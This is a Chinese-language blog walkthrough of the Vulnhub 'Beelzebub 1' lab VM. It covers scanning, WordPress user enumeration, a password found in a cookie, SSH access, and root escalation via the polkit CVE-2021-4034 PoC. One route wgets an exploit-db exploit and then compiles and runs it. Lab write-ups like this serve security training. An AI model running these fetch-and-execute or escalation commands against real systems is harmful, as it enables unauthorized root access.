Vulnhub靶机:Beelzebub 1

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:Beelzebub:1(10.0.2.9)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/beelzebub-1,742/

二、信息收集

使用nmap主机发现靶机ip10.0.2.9

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80

在这里插入图片描述

打开网站发现是Apache2的默认页面

在这里插入图片描述

使用dirsearch目录爆破。发现index.php的响应码是200,但直接访问页面不正常,并且页面显示的Apache/2.4.30和使用nmap扫描出来的Apache httpd 2.4.29 ((Ubuntu))不同,怀疑该页面是自己写的。

在这里插入图片描述
在这里插入图片描述

查看index.php的页面源码,发现注释:My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5

在这里插入图片描述

使用MD5加密beelzebubd18e1e22becbd915b45e0e655429d487

使用dirseach扫描http://10.0.2.9/d18e1e22becbd915b45e0e655429d487/,发现使用worpress搭建的网站

在这里插入图片描述

三、漏洞利用

这里手工没有找到漏洞,直接使用wpscan进行扫描,扫描发现两个用户名:krampus、valak

wpscan --api-token <your token> --url http://10.0.2.9//d18e1e22becbd915b45e0e655429d487/ --enumerate u,p,t --plugins-detection aggressive --detection-mode aggressive

在这里插入图片描述

后续尝试使用wpscan对网站进行密码爆破,但爆破不出来,看了大佬的wp,发现在10.0.2.9/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/里面还有一个页面

在这里插入图片描述
在这里插入图片描述

输入用户名,点击Say Hi to VALAK!,查看cookie会显示密码:M4k3Ad3a1

在这里插入图片描述

使用用户名密码登录网站发现登录失败,登录ssh登录成功

在这里插入图片描述

四、提权

方法一:

使用命令查找具有root权限的文件,发现/usr/lib/policykit-1/polkit-agent-helper-1policykit-1存在漏洞,漏洞编号:CVE-2021-4034CVE-2021-3560

find / -perm -u=s 2>/dev/null

在这里插入图片描述

下载对应的poc,使用scp上传到靶机,并执行,获取root权限

scp cve-2021-4034.c krampus@10.0.2.9:/home/krampus

在这里插入图片描述

gcc -pthread cve-2021-4034.c -o cve-2021-4034 -lcrypt

在这里插入图片描述

方法二:

查看命令历史记录,没有被清空,并且能发现可疑记录

cat .bash_history

在这里插入图片描述

根据命令操作也能成功提权

wget https://www.exploit-db.com/download/47009
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit

获取flag:

在这里插入图片描述

参考链接:(Vulnhub靶场)BEELZEBUB: 1 write up_beelzebub靶机漏洞复现-CSDN博客

  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值